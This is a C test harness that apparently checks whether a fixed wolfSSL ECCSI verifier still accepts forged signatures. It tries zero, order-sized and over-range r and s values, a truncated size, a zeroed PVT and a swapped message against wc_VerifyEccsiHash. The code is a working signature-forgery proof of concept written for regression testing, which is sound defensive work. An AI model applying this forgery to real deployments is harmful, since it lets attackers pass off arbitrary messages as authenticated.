#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wolfssl/options.h>
#include <wolfssl/wolfcrypt/eccsi.h>
#include <wolfssl/wolfcrypt/hash.h>
#include <wolfssl/wolfcrypt/random.h>

#define CURVE_SIZE 32
#define SIG_SIZE (CURVE_SIZE * 4 + 1) /* 129 for P-256 */

static void print_hex(const char* label, const byte* data, word32 len)
{
    printf("%s", label);
    for (word32 i = 0; i < len; i++) {
        printf("%02x", data[i]);
    }
    printf("\n");
}

static void set_scalar(byte* sig, word32 offset, word32 sz, const byte* val, word32 val_len)
{
    memset(sig + offset, 0, sz);
    if (val_len > 0 && val != NULL) {
        if (val_len <= sz) {
            memcpy(sig + offset + sz - val_len, val, val_len);
        } else {
            memcpy(sig + offset, val + val_len - sz, sz);
        }
    }
}

static int add_one_to_bytes(byte* out, const byte* in, word32 len)
{
    int carry = 1;
    for (int i = (int)len - 1; i >= 0; i--) {
        int sum = in[i] + carry;
        out[i] = (byte)(sum & 0xFF);
        carry = sum >> 8;
    }
    return carry; /* returns 1 if overflow */
}

static int double_bytes(byte* out, const byte* in, word32 len)
{
    int carry = 0;
    for (int i = (int)len - 1; i >= 0; i--) {
        int sum = in[i] * 2 + carry;
        out[i] = (byte)(sum & 0xFF);
        carry = sum >> 8;
    }
    return carry;
}

int main(int argc, char* argv[])
{
    int ret;
    int overall_bypass = 1; /* 0 if any variant passes on fixed version */
    EccsiKey kms_key, pub_key;
    WC_RNG rng;
    mp_int ssk;
    ecc_point* pvt = NULL;
    byte id[] = "test@wolfssl.com";
    word32 idSz = (word32)strlen((char*)id);
    byte msg[] = "FORGED: any text the attacker wants the victim to authenticate";
    word32 msgSz = (word32)sizeof(msg) - 1;
    byte sig[SIG_SIZE];
    word32 sigSz = sizeof(sig);
    byte hash[WC_MAX_DIGEST_SIZE];
    byte hashSz;
    int verified;
    byte q_bytes[CURVE_SIZE];

    printf("=== ECCSI Variant / Bypass Test ===\n");
    printf("Message: %s\n", msg);
    printf("Identity: %s\n", id);
    printf("\n");

    ret = wc_InitRng(&rng);
    if (ret != 0) { printf("wc_InitRng failed: %d\n", ret); return 1; }

    ret = wc_InitEccsiKey_ex(&kms_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) { printf("wc_InitEccsiKey_ex failed: %d\n", ret); return 1; }

    ret = wc_MakeEccsiKey(&kms_key, &rng);
    if (ret != 0) { printf("wc_MakeEccsiKey failed: %d\n", ret); return 1; }

    ret = mp_init(&ssk);
    if (ret != 0) { printf("mp_init failed: %d\n", ret); return 1; }

    pvt = wc_ecc_new_point_h(NULL);
    if (pvt == NULL) { printf("wc_ecc_new_point_h failed\n"); return 1; }

    ret = wc_MakeEccsiPair(&kms_key, &rng, WC_HASH_TYPE_SHA256, id, idSz, &ssk, pvt);
    if (ret != 0) { printf("wc_MakeEccsiPair failed: %d\n", ret); return 1; }

    ret = wc_HashEccsiId(&kms_key, WC_HASH_TYPE_SHA256, id, idSz, pvt, hash, &hashSz);
    if (ret != 0) { printf("wc_HashEccsiId failed: %d\n", ret); return 1; }

    ret = wc_SetEccsiHash(&kms_key, hash, hashSz);
    if (ret != 0) { printf("wc_SetEccsiHash failed: %d\n", ret); return 1; }

    ret = wc_SetEccsiPair(&kms_key, &ssk, pvt);
    if (ret != 0) { printf("wc_SetEccsiPair failed: %d\n", ret); return 1; }

    ret = wc_SignEccsiHash(&kms_key, &rng, WC_HASH_TYPE_SHA256, msg, msgSz, sig, &sigSz);
    if (ret != 0) { printf("wc_SignEccsiHash failed: %d\n", ret); return 1; }
    printf("Real signature generated, size=%u\n", sigSz);

    ret = mp_to_unsigned_bin_len(&kms_key.params.order, q_bytes, CURVE_SIZE);
    if (ret != 0) { printf("mp_to_unsigned_bin_len failed: %d\n", ret); return 1; }
    print_hex("Curve order q: ", q_bytes, CURVE_SIZE);
    printf("\n");

    ret = wc_InitEccsiKey_ex(&pub_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) { printf("wc_InitEccsiKey_ex (pub) failed: %d\n", ret); return 1; }

    byte pubData[CURVE_SIZE * 2 + 1];
    word32 pubSz = sizeof(pubData);
    ret = wc_ExportEccsiPublicKey(&kms_key, pubData, &pubSz, 1);
    if (ret != 0) { printf("wc_ExportEccsiPublicKey failed: %d\n", ret); return 1; }
    ret = wc_ImportEccsiPublicKey(&pub_key, pubData, pubSz, 1);
    if (ret != 0) { printf("wc_ImportEccsiPublicKey failed: %d\n", ret); return 1; }
    ret = wc_SetEccsiHash(&pub_key, hash, hashSz);
    if (ret != 0) { printf("wc_SetEccsiHash (pub) failed: %d\n", ret); return 1; }

    /* Precompute some values */
    byte q_plus_one[CURVE_SIZE];
    byte q_minus_one[CURVE_SIZE];
    byte two_q[CURVE_SIZE];
    byte one[CURVE_SIZE];
    byte zero[CURVE_SIZE];
    memset(zero, 0, CURVE_SIZE);
    memset(one, 0, CURVE_SIZE); one[CURVE_SIZE-1] = 1;
    memcpy(q_plus_one, q_bytes, CURVE_SIZE);
    add_one_to_bytes(q_plus_one, q_bytes, CURVE_SIZE);
    memcpy(q_minus_one, q_bytes, CURVE_SIZE);
    /* q_minus_one = q - 1 */
    for (int i = (int)CURVE_SIZE - 1; i >= 0; i--) {
        int borrow = 0;
        if (i == (int)CURVE_SIZE - 1) {
            borrow = (q_bytes[i] < 1);
            q_minus_one[i] = q_bytes[i] - 1;
        } else {
            int sub = q_bytes[i] - borrow;
            if (sub < 0) { sub += 256; borrow = 1; }
            else { borrow = 0; }
            q_minus_one[i] = (byte)sub;
        }
    }
    double_bytes(two_q, q_bytes, CURVE_SIZE);

    struct {
        const char* name;
        const byte* r_val;
        const byte* s_val;
        int expect_vuln_accept;
        int expect_fixed_accept;
    } tests[] = {
        /* 1. Original exploit */
        {"r=0, s=0 (original)", zero, zero, 1, 0},
        /* 2. Upper boundary: exactly order */
        {"r=order, s=order", q_bytes, q_bytes, 0, 0},
        /* 3. Above upper boundary: order+1 */
        {"r=order+1, s=order+1", q_plus_one, q_plus_one, 0, 0},
        /* 4. Double order */
        {"r=2q, s=2q", two_q, two_q, 0, 0},
        /* 5. r=0 with valid s (tests r-check alone) */
        {"r=0, s=order-1", zero, q_minus_one, 0, 0},
        /* 6. s=0 with valid r (tests s-check alone) */
        {"r=1, s=0", one, zero, 0, 0},
        /* 7. Valid scalars, random signature (sanity) */
        {"r=order-1, s=order-1", q_minus_one, q_minus_one, 0, 0},
    };
    int num_tests = sizeof(tests) / sizeof(tests[0]);

    printf("--- Variant / Bypass Attempts ---\n");
    for (int i = 0; i < num_tests; i++) {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        set_scalar(forged, 0, CURVE_SIZE, tests[i].r_val, CURVE_SIZE);
        set_scalar(forged, CURVE_SIZE, CURVE_SIZE, tests[i].s_val, CURVE_SIZE);

        printf("\nTest %d: %s\n", i + 1, tests[i].name);
        print_hex("  Forged r: ", forged, CURVE_SIZE);
        print_hex("  Forged s: ", forged + CURVE_SIZE, CURVE_SIZE);

        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);

        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            if (tests[i].expect_fixed_accept == 0) {
                printf("  WARNING: Unexpected acceptance on fixed version!\n");
                overall_bypass = 0;
            }
        } else {
            printf("  Forgery rejected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    /* 8. Test with wrong sigSz to check parser robustness */
    {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2); /* r=0, s=0 */
        printf("\nTest %d: r=0, s=0 with wrong sigSz (SIG_SIZE-1)\n", num_tests + 1);
        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE - 1, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);
        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED (BYPASS via size) ***\n");
            overall_bypass = 0;
        } else {
            printf("  Rejected as expected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    /* 9. Test with r=0, s=0 but PVT is infinity point (malformed) */
    {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2); /* r=0, s=0 */
        /* Overwrite PVT with all zeros (infinity point encoding attempt) */
        memset(forged + CURVE_SIZE * 2, 0, CURVE_SIZE * 2 + 1);
        printf("\nTest %d: r=0, s=0 with PVT set to infinity encoding\n", num_tests + 2);
        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);
        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED (BYPASS via PVT) ***\n");
            overall_bypass = 0;
        } else {
            printf("  Rejected as expected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    /* 10. Test with a different message (same as original repro) */
    {
        byte msg2[] = "Completely different message";
        word32 msg2Sz = (word32)sizeof(msg2) - 1;
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2);
        printf("\nTest %d: r=0, s=0 with DIFFERENT message\n", num_tests + 3);
        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg2, msg2Sz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);
        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            overall_bypass = 0;
        } else {
            printf("  Rejected as expected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    wc_ecc_del_point_h(pvt, NULL);
    mp_clear(&ssk);
    wc_FreeEccsiKey(&kms_key);
    wc_FreeEccsiKey(&pub_key);
    wc_FreeRng(&rng);

    printf("\n=== Overall bypass verdict: %s ===\n",
           overall_bypass == 0 ? "BYPASS CONFIRMED" : "NO BYPASS");

    return overall_bypass; /* 0 = bypass found, 1 = no bypass */
}
